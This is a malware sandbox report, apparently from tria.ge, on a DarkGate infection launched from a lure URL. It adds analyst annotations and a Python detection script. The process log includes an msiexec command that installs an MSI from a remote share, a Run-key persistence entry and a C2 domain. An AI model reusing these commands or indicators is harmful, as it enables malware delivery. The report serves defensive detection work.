Analysis
max time kernel: 1800s
max time network: 1805s
platform: windows11-21h2_x64
resource: win11-20240221-en
resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 27/02/2024, 16:32
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://wordonlinestorage.com
Resource
win11-20240221-en
General
Target: http://wordonlinestorage.com
Malware Config
Extracted
Family: darkgate
Username: admin888
C2: remasterprodelherskjs.com (c2_port 80)
Attributes:
anti_analysis: false
anti_debug: false
anti_vm: false
c2_port: 80
check_disk: false
check_ram: false
check_xeon: false
crypter_au3: false
crypter_dll: false
crypter_raw_stub: false
internal_mutex: kiQRLFmc
minimum_disk: 50
minimum_ram: 7000
ping_interval: 6
rootkit: false
startup_persistence: true
username: admin888
Every evasion switch in this build (anti_analysis, anti_debug, anti_vm, check_disk, check_ram, check_xeon) is off, so the minimum_disk and minimum_ram thresholds are never consulted and the sample runs to completion on the sandbox image. startup_persistence is true, which is what the Run key under Signatures implements. internal_mutex kiQRLFmc is a host-level indicator that survives renaming of the dropped files.
Signatures
Detect DarkGate stealer 11 IoCs
resource | yara_rule
behavioral1/memory/1600-216-0x0000000005E20000-0x000000000616F000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-227-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/1600-232-0x0000000005E20000-0x000000000616F000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-236-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/1168-241-0x0000000002510000-0x0000000002CB2000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-242-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-243-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-245-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/1168-249-0x0000000002510000-0x0000000002CB2000-memory.dmp | family_darkgate_v6
behavioral1/memory/432-250-0x0000000002630000-0x0000000002DD2000-memory.dmp | family_darkgate_v6
behavioral1/memory/1168-251-0x0000000002510000-0x0000000002CB2000-memory.dmp | family_darkgate_v6
All hits are memory-only and sit in three processes: PID 1600 (Autoit3.exe, the loader) and PIDs 432 and 1168 (GoogleUpdateCore.exe, into which the unpacked payload was placed). Nothing on disk matched the rule, so file hashes alone will not catch this stage.
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 1600 created 3824 | 1600 | Autoit3.exe | 105
PID 432 created 3676 | 432 | GoogleUpdateCore.exe | 46
PID 432 created 3676 | 432 | GoogleUpdateCore.exe | 46
PID 432 created 3036 | 432 | GoogleUpdateCore.exe | 49
The calling process is not the parent the new process ends up with (parent-PID spoofing via the parent-process attribute on NtCreateUserProcess). This is why GoogleUpdateCore.exe PID 432 appears under msiexec.exe PID 3824 in the Processes tree although Autoit3.exe (1600) started it, and why GoogleUpdateCore.exe PID 1168 appears under svchost.exe PID 3036: the tree shows the claimed parent, these IoCs show the real creator.
Executes dropped EXE 2 IoCs
pid | Process
2720 | iTunesHelper.exe
1600 | Autoit3.exe
Loads dropped DLL 2 IoCs
pid | Process
2276 | MsiExec.exe
2720 | iTunesHelper.exe
Modifies file permissions 1 TTPs 2 IoCs
pid | Process
2680 | ICACLS.EXE
4840 | ICACLS.EXE
Use of msiexec (install) with remote resource 1 IoCs
pid | Process
3824 | msiexec.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\bhbHCDc = "C:\\ProgramData\\fgafcad\\Autoit3.exe C:\\ProgramData\\fgafcad\\hkafbhd.a3x" | GoogleUpdateCore.exe
The Run value is the startup_persistence setting from the extracted config: it points at a copy of the AutoIt interpreter plus a compiled script (.a3x) under C:\ProgramData\fgafcad\, and it is written by GoogleUpdateCore.exe PID 432, the process the payload runs in. The value name (bhbHCDc), directory (fgafcad) and script name (hkafbhd.a3x) look generated per infection, so hunt on the pattern "Autoit3.exe <path>.a3x under ProgramData" rather than on these exact strings.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: | msiexec.exe
Each of the 23 drive letters is opened twice (46 events). Both msiexec.exe instances (the client, PID 3824, and the service, PID 2996) carry this signature; Windows Installer probes volumes during an install, so on its own this is installer noise rather than DarkGate behaviour.
Drops file in Windows directory 13 IoCs
description | ioc | Process
File opened for modification | C:\Windows\LOGS\DPX\setupact.log | EXPAND.EXE
File created | C:\Windows\SystemTemp\~DF056B0724DA827F0A.TMP | msiexec.exe
File created | C:\Windows\SystemTemp\~DF42CC6D97F31E86C1.TMP | msiexec.exe
File created | C:\Windows\Installer\SourceHash{3FEDD42F-832E-495B-A157-E5BB940CC16D} | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\SystemTemp\~DF21CF1AB7DA971C22.TMP | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC41.tmp | msiexec.exe
File created | C:\Windows\Installer\e5b0849.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\e5b0849.msi | msiexec.exe
File created | C:\Windows\SystemTemp\~DFC915F854C5FA0A2F.TMP | msiexec.exe
File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | EXPAND.EXE
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004b52018b2f23ece20000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004b52018b0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004b52018b000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4b52018b000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004b52018b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
All five IoCs come from vssvc.exe (PID 2836), the Volume Shadow Copy service, while it handled the restore point that the MSI install requested (srtasks.exe ExecuteScopeRestorePoint in the Processes tree). These writes are the service caching partition-table and snapshot data; they are not a sandbox check by the sample, even though the signature text suggests one.
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Autoit3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Autoit3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Unlike the SCSI reads above, these come from the DarkGate processes themselves (Autoit3.exe PID 1600, GoogleUpdateCore.exe PIDs 432 and 1168). ProcessorNameString is read even though the extracted config has check_xeon set to false.
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133535251363749336" | chrome.exe
Both of these signatures are raised only by chrome.exe, the browser the sandbox used to open the URL, not by any process in the DarkGate chain.
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid | Process | events
1628 | chrome.exe | 2
2996 | msiexec.exe | 2
1600 | Autoit3.exe | 4
432 | GoogleUpdateCore.exe | 8
1168 | GoogleUpdateCore.exe | 2
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
432 | GoogleUpdateCore.exe
1168 | GoogleUpdateCore.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid | Process | events
1628 | chrome.exe | 3
Suspicious use of AdjustPrivilegeToken 64 IoCs
pid | Process | tokens (in order of occurrence)
1628 | chrome.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege (the pair repeated 11 times, 22 events)
3824 | msiexec.exe | SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (31 events)
2996 | msiexec.exe | SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege (7 events)
2836 | vssvc.exe | SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege (3 events)
3192 | srtasks.exe | SeBackupPrivilege (1 event)
None of the 64 adjustments is made by a DarkGate process. The msiexec.exe client (PID 3824) enabling its full privilege set, and the service side (PID 2996), vssvc.exe and srtasks.exe taking backup/restore privileges, is the normal shape of an elevated MSI install that creates a restore point; the interesting part of this report is what the install runs, not the privilege activity.
Suspicious use of FindShellTrayWindow 29 IoCs
pid | Process | events
1628 | chrome.exe | 27
3824 | msiexec.exe | 2
Suspicious use of SendNotifyMessage 12 IoCs
pid | Process | events
1628 | chrome.exe | 12
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | events
PID 1628 wrote to memory of 836 | 1628 | chrome.exe | 43 | 2
PID 1628 wrote to memory of 2628 | 1628 | chrome.exe | 83 | 39
PID 1628 wrote to memory of 1832 | 1628 | chrome.exe | 84 | 2
PID 1628 wrote to memory of 1232 | 1628 | chrome.exe | 85 | 21
Every WriteProcessMemory event is the Chrome browser process (1628) writing into its own child processes (crashpad handler 836, GPU process 2628, network service 1832, storage service 1232); that is how Chromium bootstraps its sandboxed children, not injection by the sample. The DarkGate injection into GoogleUpdateCore.exe is recorded under NtCreateUserProcessOtherParentProcess and the in-memory YARA hits above, not here.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
The number in brackets is the depth in the process tree as reported by the sandbox (the parent a process claims, see NtCreateUserProcessOtherParentProcess above for the two cases where the real creator differs). Each entry gives PID and image path, then the command line, then the signatures attributed to that process.

[1] PID 1628 C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://wordonlinestorage.com
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
  [2] PID 836 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffe7a59758,0x7fffe7a59768,0x7fffe7a59778
  [2] PID 2628 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:2
  [2] PID 1832 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  [2] PID 1232 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  [2] PID 2748 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  [2] PID 4500 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  [2] PID 2556 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  [2] PID 796 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  [2] PID 1088 C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
[1] PID 3676 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
[1] PID 3036 C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  [2] PID 1168 C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
[1] PID 4052 C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
[1] PID 1724 C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
[1] PID 1564 C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] PID 1976 C:\Windows\System32\Notepad.exe
    "C:\Windows\System32\Notepad.exe" \\147.45.197.186\share\dark.vbs
[1] PID 3824 C:\Windows\System32\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "\\147.45.197.186\share\scan.msi"
    - Use of msiexec (install) with remote resource
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
  [2] PID 432 C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Adds Run key to start application
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
[1] PID 2996 C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [2] PID 3192 C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 2276 C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 456212F71EA4632926A9D5CE0522ECE6
      - Loads dropped DLL
    [3] PID 2680 C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        - Modifies file permissions
    [3] PID 4464 C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        - Drops file in Windows directory
    [3] PID 2720 C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe"
        - Executes dropped EXE
        - Loads dropped DLL
      [4] PID 1600 \??\c:\temp\Autoit3.exe
          "c:\temp\Autoit3.exe" c:\temp\script.a3x
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Executes dropped EXE
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
    [3] PID 1556 C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files"
    [3] PID 4840 C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        - Modifies file permissions
[1] PID 2836 C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken

Reading the tree as a chain: the URL opened in Chrome leads to two things being launched against a remote share at 147.45.197.186, Notepad.exe with \\147.45.197.186\share\dark.vbs (the script is only displayed, no wscript/cscript execution is recorded) and msiexec.exe /i \\147.45.197.186\share\scan.msi. The installer's custom action (the 32-bit MsiExec.exe -Embedding server, PID 2276) unpacks files.cab into a temp folder, raises the folder's integrity level, runs the dropped iTunesHelper.exe, which loads a dropped DLL from the same folder, and that in turn runs c:\temp\Autoit3.exe with c:\temp\script.a3x. The AutoIt stage unpacks DarkGate in memory and starts GoogleUpdateCore.exe re-parented under msiexec.exe (PID 432), which writes the Run key and spawns a second copy (PID 1168) re-parented under svchost.exe. The temp folder is then deleted (cmd.exe rd /s /q) and its integrity level lowered again, which is why the dropped DLL and iTunesHelper.exe have to be recovered from the Downloads list below rather than from disk.
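The chain above can be turned into detection logic. The following Python is an added example written for this page; it is not tria.ge code and not part of the sample. It checks four things the report shows: msiexec.exe installing an .msi from a UNC path, an AutoIt interpreter running a compiled .a3x script from a user-writable directory, a Run-key value that launches such an interpreter, and a child process whose creator differs from its recorded parent (the NtCreateUserProcessOtherParentProcess signature). The event dictionaries, their field names (image, cmdline, parent_pid, creator_pid, key, data) and the parent PIDs of the root processes are constructed assumptions, to be mapped onto a real EDR or ETW schema; Sysmon Event 1 in particular does not expose the creator PID.

```python
"""Triage rules for the DarkGate delivery chain seen in the report above.

Added example, not tria.ge code. Event dicts use this example's own field
names; the sample events are constructed from the report's Processes tree.
"""
import re
from dataclasses import dataclass

# "\\host\share\path" (no quote or whitespace inside the host part)
UNC_RE = re.compile(r'(?<![\w:])\\\\[^\\\s"]+\\[^\s"]+')
# Directories an unprivileged user can write to; extend for your estate.
USER_WRITABLE = (r"c:\programdata", r"c:\users", r"c:\temp", r"c:\windows\temp")
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def is_user_writable(path: str) -> bool:
    return path.strip('"').lower().startswith(USER_WRITABLE)


def check_msiexec_remote(ev: dict):
    """msiexec.exe /i <UNC .msi>: an MSI installed straight from a remote share."""
    if not ev["image"].lower().endswith(r"\msiexec.exe"):
        return None
    if not re.search(r"(^|\s)[/-]i(\s|$)", ev["cmdline"], re.I):
        return None
    m = UNC_RE.search(ev["cmdline"])
    if m and m.group(0).lower().endswith(".msi"):
        return Finding("msiexec_remote_install", ev["pid"], m.group(0))
    return None


def check_autoit_script(ev: dict):
    """AutoIt interpreter (by image name or PE original filename) running a
    compiled .a3x script that lives in a user-writable directory."""
    img = ev["image"].lower()
    orig = ev.get("original_filename", "").lower()
    if not (img.endswith(r"\autoit3.exe") or orig == "autoit3.exe"):
        return None
    # quoted path (may contain spaces) or a bare token ending in .a3x
    m = re.search(r'"([^"]+\.a3x)"|(\S+\.a3x)', ev["cmdline"], re.I)
    if not m:
        return None
    script = m.group(1) or m.group(2)
    return Finding("autoit_compiled_script", ev["pid"], script) if is_user_writable(script) else None


def check_ppid_spoof(ev: dict):
    """The process that called NtCreateUserProcess is not the parent the child
    reports: PROC_THREAD_ATTRIBUTE_PARENT_PROCESS was used to re-parent it."""
    creator, parent = ev.get("creator_pid"), ev.get("parent_pid")
    if creator is not None and parent is not None and creator != parent:
        return Finding("ppid_spoof", ev["pid"], f"creator {creator} != parent {parent}")
    return None


def check_run_key(ev: dict):
    """Run-key value whose data launches AutoIt or a .a3x from a writable path."""
    if RUN_KEY not in ev["key"].lower():
        return None
    if re.search(r"autoit3\.exe|\.a3x\b", ev["data"], re.I) and is_user_writable(ev["data"]):
        return Finding("run_key_autoit", ev["pid"], ev["data"])
    return None


def triage(events):
    """Apply every rule to each event; findings come back in event order."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            rules = (check_msiexec_remote, check_autoit_script, check_ppid_spoof)
        elif ev["type"] == "registry_set":
            rules = (check_run_key,)
        else:
            continue
        findings.extend(f for f in (rule(ev) for rule in rules) if f)
    return findings


# Constructed events mirroring the report. Parent PIDs of the root processes
# (1000, 700) are made up; the tree does not show them.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 1628, "parent_pid": 1000, "creator_pid": 1000,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument http://wordonlinestorage.com'},
    {"type": "process_create", "pid": 3824, "parent_pid": 1628, "creator_pid": 1628,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "\\147.45.197.186\share\scan.msi"'},
    {"type": "process_create", "pid": 2996, "parent_pid": 700, "creator_pid": 700,
     "image": r"C:\Windows\system32\msiexec.exe", "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"type": "process_create", "pid": 1600, "parent_pid": 2720, "creator_pid": 2720,
     "image": r"c:\temp\Autoit3.exe", "cmdline": r'"c:\temp\Autoit3.exe" c:\temp\script.a3x'},
    {"type": "process_create", "pid": 432, "parent_pid": 3824, "creator_pid": 1600,
     "image": r"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe",
     "cmdline": r'"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"'},
    {"type": "registry_set", "pid": 432,
     "key": r"HKU\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\bhbHCDc",
     "data": r"C:\ProgramData\fgafcad\Autoit3.exe C:\ProgramData\fgafcad\hkafbhd.a3x"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:24s} pid={f.pid:<5d} {f.detail}")
```

Run against the constructed events, the four rules fire once each (PIDs 3824, 1600, 432, 432) and stay silent on the benign msiexec.exe /V service instance and on Chrome. The msiexec rule deliberately ignores local .msi paths, and the AutoIt rule ignores scripts under Program Files; both are where the false positives would otherwise come from.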
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1KB
MD5: 2ddafd05722be6d7cd6cc73b5b98142a
SHA1: 2c18d7c72f940140c1155e5a3da2d3443dadd5a1
SHA256: 89b10fd9514d79cf3bbb2bad41cc9fc76ca78f21310d9b906c80a5c8fd5b9215
SHA512: cae4810a6ef0d47096792df94d1eac2bc9d340b0202c58902606ee8f956a2438063b65d230e396dbc07e8e695ba5bea18f07a0254196af3778544aed167a60f9

Filesize: 478KB
MD5: 0fe411da1e0ec15bd5a9d7a385454502
SHA1: b57230f44e5f1f091a971047ce995598c665bd7d
SHA256: def9a66ba72c77a74ed784d52454bb00d7eb1f4442ccdb87f6c7972d2ad55cd0
SHA512: f991d33288ab685a61e31c5bdf5e53966de433d2c11cbe8e1de7ad2d3bdfec899fccc29d5571f97bf34f111c8425da325d86a5b2345c2ce9658bbe2972ef6cf7

Filesize: 1KB
MD5: 2187a02147df1d557f95028a4d25befe
SHA1: eafe8cb707cee3180e2b84cf9efefcdad1c2be6a
SHA256: 684eb7b267d8e80823d292c514c024cee1bdf8866d1098d03bd624084cdda358
